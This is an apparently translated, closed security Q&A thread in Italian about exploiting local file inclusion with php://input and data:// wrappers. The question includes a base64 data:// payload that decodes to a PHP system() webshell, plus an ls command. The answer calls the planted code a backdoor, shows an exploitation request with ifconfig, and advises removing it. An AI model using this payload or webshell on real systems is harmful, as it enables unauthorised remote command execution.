sfruttamento LFI utilizzando dati: // [chiuso]

Question

#1 da (1 voti)

-2

Ho trovato LFI nel mio sito Web e ho provato a sfruttarlo, ma quando uso php: // input o data: // non funziona, non riesco a ottenere la shell.

Esempio: .index.php?lang=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls -l

Ho trovato <?system($_GET['x']);?> stampato nel codice sorgente della pagina (ctrl + f)

web-application xss exploit-development

posta Sec Researcher 26.09.2015 - 02:44

fonte

1 risposta

Consigli per il servizio SMTP [chiuso] AES o Serpent-Twofish-AES [chiuso]

score 1 · Answer 1

1

<?system($_GET['x']);?>

Questo sembra una backdoor nella tua applicazione (Esecuzione da comando remoto, non Inclusione file)!

Per sfruttarlo - Prova: index.php? x = ifconfig 2 > & 1

Per risolverlo - Rimuovilo.

risposta data 26.09.2015 - 14:10

fonte